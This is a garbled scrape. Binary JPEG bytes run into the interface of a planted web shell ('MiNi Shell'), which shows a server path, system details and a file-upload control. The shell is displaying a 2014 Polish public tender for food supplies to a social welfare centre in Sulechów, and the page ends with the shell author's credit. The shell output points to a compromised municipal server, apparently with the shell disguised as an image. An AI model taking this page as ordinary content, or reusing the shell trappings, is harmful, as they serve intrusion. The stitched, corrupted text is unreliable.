JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20141127/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20141127/389460-N-2014.html

<p class="kh_header"><b>Sulechów: DOSTAWA Artykułów Spożywczych dla Centrum Usług Socjalnych Ośrodka Pomocy Społecznej w Sulechowie</b><br>
<b>Numer ogłoszenia: 389460 - 2014; data zamieszczenia: 27.11.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Ośrodek Pomocy Społecznej , ul. Jana Pawła II 52, 66-100 Sulechów, woj. lubuskie, tel. 0-68 4782244, faks 0-68 4782245.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://ops.bip.sulechow.pl/</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> DOSTAWA Artykułów Spożywczych dla Centrum Usług Socjalnych Ośrodka Pomocy Społecznej w Sulechowie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Lp.
Nazwa
j.m.
Ilość*
ZADANIE  A - artykuły spożywcze	

1 Aromat do ciast  9 ml  Szt.5
2 Ananas plastry w syropie 560g Szt. 100
3 Biszkopty wrocławskie  Mamut lub równoważne 225g Szt. 100
4 Bułka tarta ( 500g) Szt. 300 
5 Barszcz biały 66 g Szt. 700
6 Budyń- Winiary lub równoważny 60g Szt. 250
7 Bobofrut  OVITA  lub równoważny  300ml Szt. 1000
8 Baton Snickers lub równoważny 51g Szt. 200
9 Baton Grzesiek w czekoladzie lub równoważny 39g Szt. 300
10 Chrzan konserwowy ok. 300 g Szt. 100
11 Czekolada mleczna 100g Szt. 300
12 Cukier waniliowy 16g Szt. 200
13 Cukier puder 500g Szt. 30
14 Cukier kryształ 1 kg kg 2200
15 Cynamon 20g  Szt. 30
16 Ciastka i wafle luz Kg  40
17 Cukierki owocowe luz Kg 40
18 Chrupki kukurydziane 80g  Szt. 100
19 Dżem owocowy 300g Szt. 100
20 Fasola biała 500g Szt. 400
21 Fasolka szparagowa Rolnik lub równoważna 500 g  Szt.  60
22 Groszek konserwowy  400g Szt. 100
23 Groch łuskany połówki 500 g Szt. 250
24 Herbata ekspresowa Minutka lub równoważna 140g Szt. 50
25 Herbata miętowa 40g Szt. 10
26 Konserwa mięsna 300g Szt. 400
27 Ketchup Tortex łagodny lub równoważny 500g Szt. 150
28 Koncentrat barszczu czerwonego 330 ml Szt. 50
29 Kawa zbożowa Celinka lub równoważna 100g Szt. 20
30 Kaszka mleczno-ryżowa owocowa Bobo Vita od 6-go m-ca lub równoważna 230g Szt. 100
31 Kleik ryżowy Bobo Vita lub równoważny 170g Szt. 50
32 Kasza manna błyskawiczna 500g Szt. 50
33 Kasza jęczmienna średnia 500g Szt. 800
34 Koncentrat pomidorowy Pudliszki lub równoważny 1kg kg. 400
35 Kukurydza konserwowa  400g Szt. 200
36 Kakao naturalne 100g Szt. 5
37 Kakao rozpuszczalne 300g Szt. 15
38 Kisiel Winiary lub równoważny 77g Szt. 350
39 Musztarda sarepska  200g Szt. 50 
40 Majonez Winiary lub równoważny 700g Szt. 140
41 Makaron świderki 500g Szt. 1000
42 Makaron nitki rosołowe 500g Szt. 500
43 Makaron łazanka 500g  Szt. 300
44 Makaron kolanka 500g Szt. 500
45  Mąka tortowa 1kg Kg. 2000
46 Napój owocowy, kartonik, niegazowany 200ml Szt. 300
47 Napój owocowy niegazowany 2l Szt. 100
48 Olej uniwersalny 1 l Szt. 800
49 Ocet   0,5 l Szt. 70
50 Ogórek konserwowy 820 g netto Szt. 400
51 Płatki owsiane 500g Szt. 30
52 Paprykarz  300g Szt. 300
53 Paluszki słone 70g Szt. 100
54 Płatki kukurydziane 250g Szt. 100
55 Płatki ryżowe 200g Szt. 30
56 Proszek do pieczenia 36g Szt. 50
57 Pasztet drobiowy Profi lub równoważny 131g Szt. 300
58 Ryż 1 kg Kg. 600
59 Rodzynki 100g Szt. 50
60 Szczaw konserwowy siekany Vitmar lub równoważny 300g  Szt. 600
61Sól kuchenna jodowana 1 kg Kg. 500
62 Sól kamienna 1 kg Kg. 10
63 Soda oczyszczona  Gellwelub równoważny 80g Szt. 4
64 Syrop owocowy Herbapol lub równoważny 500g Szt. 50
65 Nutella Ferrero lub równoważna 230g Szt. 50
66 Mąka ziemniaczana 500g Szt. 200
67 Miód naturalny 370g Szt. 35
68 Czosnek Kamis granulowany lub równoważny  1,10 kg Szt. 30
69 Kwasek cytrynowy Kamis lub równoważny  500g Szt. 2
70 Liść laurowy Kamis lub równoważny  100g Szt.  10
71 Majeranek Kamis lub równoważny 150g Szt. 25
72 Papryka mielona słodka Kamis lub równoważna 800g Szt. 2
73 Przyprawa do zup klasyczna Winiary lub równoważna 1 litr Szt. 500
74 Pieprz czarny mielony Kamis lub równoważny 1kg Kg 15
75 Przyprawa do kurczaka Kamis lub równoważna 1,20kg Szt. 10
76 Przyprawa do flaków Kamis lub równoważna 800g Szt. 5
77 Oregano Kamis lub równoważny 750g Szt. 1
78 Przyprawa do ryb Kamis lub równoważna  800g Szt. 10
79 Przyprawa uniwersalna Degusta lub równoważna  1kg kg 200
80 Ziele angielskie Kamis lub równoważne  600g Szt. 5
81 Bazylia  Kamis lub równoważna 300g Szt. 1
82 Kasza gryczana 400g Szt. 500 
83 Płatki jęczmienne 400g Szt. 30
84 Ciastka Petit Bery 100g lub równoważne Szt. 150
85 Słonecznik łuskany 100 g Szt. 50
86 Galaretka owocowa Winiary lub równoważna 75 g Szt. 50
87 Sos sałatkowy koperkowo-ziołowy Kamis lub równoważny 700g Szt. 4
88 Kasza jaglana 400 g Szt. 30
89 Kasza kukurydziana 400 g  Szt. 10
90 Płatki orkiszowe 400g Szt. 30
91Kawa naturalna rozpuszczalna Jacobs  lub równoważna  200 g Szt.  8
92 Kawa naturalna mielona Jacobs Kronung lub równoważna 250 g Szt.  3
93 Fasolka konserwowa czerwona 400 g Szt. 20
94 Przyprawa do dań z ziemniaków Kamis lub równoważna 25g Szt. 30
95 Zakwas na żur w butelce Jamar lub równoważny 0,5l Szt. 200
96 Żelatyna spożywcza Gellwe lub równoważna 50g Szt. 10
97 Cukierki czekoladowe Michałki luz lub równoważne Kg 10

ZADANIE B - mrożonki
1 Bruksela mrożona  - opakowanie  do 5 kg kg 100
2 Brokuły mrożone - opakowanie do  5 kg kg 50
3 Fasola szparagowa zielona mrożona- opakowanie do 5 kg kg 200
4 Fasolka szparagowa żółta, mrożona opakowanie do 5 kg kg 200
5 Kalafior mrożony - opakowanie do 5 kg kg 200
6 Mieszanka jarzynowa - 7 składnikowa na zupę jarzynową opakowanie do 5 kg  kg 500
7 Włoszczyzna mrożona opakowanie do 5 kg kg 200
8 Papryka czerwona mrożona kostka opakowanie do 5 kg kg 300
9 Marchewka z groszkiem mrożona opakowanie do 5 kg kg 300
10 Porzeczka czarna mrożona opakowanie do 5 kg kg 50
11 Truskawka mrożona opakowanie do 5 kg kg 200
12 Jagoda mrożona opakowanie do 5 kg kg 50
13 Mieszanka kompotowa bez pestki 5 składnikowa opakowanie do 5 kg kg 1500
14 Wiśnia bez pestki, mrożona opakowanie do 5 kg kg 50
15 Śliwka drylowana op. do 5 kg Kg 50
16 Malina ekstra op. do 5 kg Kg 50
17 Groszek zielony op. do 5 kg Kg 150
18 Papryka mix op.do 5 kg  Kg 100
19 Szpinak rozdrobniony op. do 5 kg Kg 150
20 Mieszanka-zupa wiosenna ze szparagami op. do 5 kg Kg 200
ZADANIE C - ryby
1 Filet śledziowy Mathias - luz kg 400
2 Filet z dorsza czarniaka, mrożony bez glazury SHP-  luz kg 400
3 Filet z morszczuka mrożony bez glazury SHP - luz kg 100
4 Makrela wędzona -Vakum z przedłużonym terminem spożycia pakowana hermetycznie kg 70
5 Filet z miruny ze skórą, mrożony bez glazury SHP-  luz kg  400
ZADANIE D - artykuły mleczarskie
1 Jogurt owocowy ok. 120g Szt. 200
2 Masło Ekstra 200g Szt.800
3 Margaryna  Palma lub równoważna 250g  Szt. 600
4 Mleko folia 2%  1 litr Szt.3000
5 Serek topiony Hochland  lub równoważny 100g Szt. 100
6 Śmietana 18%  400g Szt. 5000
7 Jogurt naturalny 370 g Szt.300
8 Serek Danonki  (4-pak)  lub równoważny  4 x 50g Szt. 300
9 Serek Danio różne smaki    lub równoważny 140g Szt. 200
10 Twaróg półtłusty  1 kg Kg 800
11 Twaróg śmietankowy  1 kg Kg 20
12 Drożdże 100g Szt. 350
13 Serek topiony Mlekovita lub równoważny 100g Szt. 1000
14 Ser  Feta 16% tł. lub równoważny 270g Szt. 50
15 Ser twardy  Havarti bloczek  lub równoważny ok. 400g kg 40
16 Ser twardy Liliput bloczek lub równoważny ok. 300g kg 5
17 Ser twardy Salami  blok lub równoważny kg 50
18 Ser twardy Gouda  blok lub równoważny kg 10
19 Śmietana 30% 200 g Szt.  70
20 Margaryna Kasia do pieczenia lub równoważna 250 g Szt. 20
21 Mleko w proszku pełne 26% OSM Siedlce lub równoważne 500 g Szt. 20.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.33.11.70-9, 15.23.30.00-0, 15.22.00.00-6, 03.31.10.00-2, 15.23.40.00-7, 15.43.10.00-8, 15.50.00.00-3, 15.51.00.00-6, 15.54.00.00-5, 15.55.13.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>

<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

</ul>

<p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>formularz oferty na załączniku nr 1 i 2, dane wykonawcy na załączniku nr 1a</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - termin płatności - 10</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>a) stawki podatku od towarów i usług w przypadku ustawowej zmiany stawek, a w konsekwencji zmiany (podwyższenia lub obniżenia) kwoty brutto wynikającej z umowy,
b) nazwy zadania,  numerów kont bankowych oraz działów, rozdziałów i paragrafów klasyfikacji budżetowej,
c) przedstawicieli stron</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> ops.bip.sulechow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Ośrodek Pomocy Społecznej Centrum Usług Socjalnych ul. Kruszyna 53a, 66-100 Sulechów
pok. nr 7.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 11.12.2014 godzina 09:30, miejsce: Ośrodek Pomocy Społecznej Centrum Usług Socjalnych ul. Kruszyna 53a, 66-100 Sulechów
pok. nr 7.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com